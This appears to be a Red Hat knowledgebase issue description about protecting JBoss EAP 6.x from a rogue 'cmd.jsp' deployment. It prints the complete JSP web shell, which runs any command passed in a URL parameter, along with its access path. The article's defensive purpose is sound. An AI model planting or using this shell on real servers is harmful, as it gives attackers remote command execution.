Securing jboss against a roque deployment which gives remote access to the machine (cmd.jsp example)
Issue
A well known hack in jboss is to deploy the so called cmd.jsp jsp command shell
<%@ page import="java.util.*,java.io.*"%>
<%
%>
<HTML><BODY>
Commands with JSP
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
out.println("Command: " + request.getParameter("cmd") + "<BR>");
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
}
%>
</pre>
</BODY></HTML>
When you got this deployed (either by metasploit, subterfuge, burp-platform) or in our case, we just deployed it, you get a command line box with:
http://server:8080/cmd/cmd.jsp
with which you can execute pretty much any command the JBoss user has access to.
Environment
JBoss Enterprise Application Platform (EAP) 6.x
Subscriber exclusive content
A Red Hat subscription provides unlimited access to our knowledgebase, tools, and much more.